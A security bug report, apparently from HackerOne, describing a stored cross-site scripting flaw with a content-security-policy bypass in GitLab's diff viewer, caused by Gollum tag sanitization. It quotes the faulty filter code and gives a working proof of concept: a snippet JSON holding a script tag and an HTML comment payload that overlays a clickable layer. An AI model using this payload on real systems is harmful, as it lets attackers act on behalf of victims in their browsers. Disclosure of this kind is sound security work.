Stored-XSS injected in diff viewer
HackerOne report #2441257 by yvvdwf on 2024-03-29, assigned to @cmaxim:
Report | Attachments | How To Reproduce
Report
Hello,
Gitlab recently changed in sanitization of Gollum links:
### https://gitlab.com/gitlab-org/gitlab/-/blob/5368a427e4ee6be16d8d38f62268efaf19ef0dea/lib/banzai/filter/gollum_tags_filter.rb#L67
doc.xpath('descendant-or-self::text()').each do |node|
next if has_ancestor?(node, IGNORED_ANCESTOR_TAGS)
next unless node.content =~ TAGS_PATTERN
html = node.content.gsub(TAGS_PATTERN) do
process_tag(Regexp.last_match(1)) || Regexp.last_match(0)
end
node.replace(html)
end Because node.content is used, it will all emit plaintext.
It allows injecting arbitrary HTML elements.
Steps to reproduce
- create a public snippet with a json file
alert.jsoncontaining{"html":"<script>alert(document.domain)</script>"}, then open the raw version and make note of the path, for example:https://gitlab.com/-/snippets/3683972/raw/main/alert.json
- In an existing project, (or create a new project then make some commits), then goto
Code / Commitsand open a commit to view its diff, then enter the following comment (after replacingdata-diff-for-pathwithin the path noted above)
<i><div class=files > <div class=diff-file> <div class=diff-content> <div data-diff-for-path=/-/snippets/3683972/raw/main/alert.json class=js-file-title style=position:fixed;top:0px;right:0px;bottom:0px;left:0px;z-index:99999> <!-- [[ ]]</i> 
- Refresh the page, then you might notice a topmost transparent layer. Click any where to trigger an alert.
Impact
Stored-XSS with CSP-bypass allows attackers to execute arbitrary actions on behalf of victims at the client side.
Output of checks
This bug happens on GitLab.com
Impact
Stored-XSS with CSP-bypass allows attackers to execute arbitrary actions on behalf of victims at the client side.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section: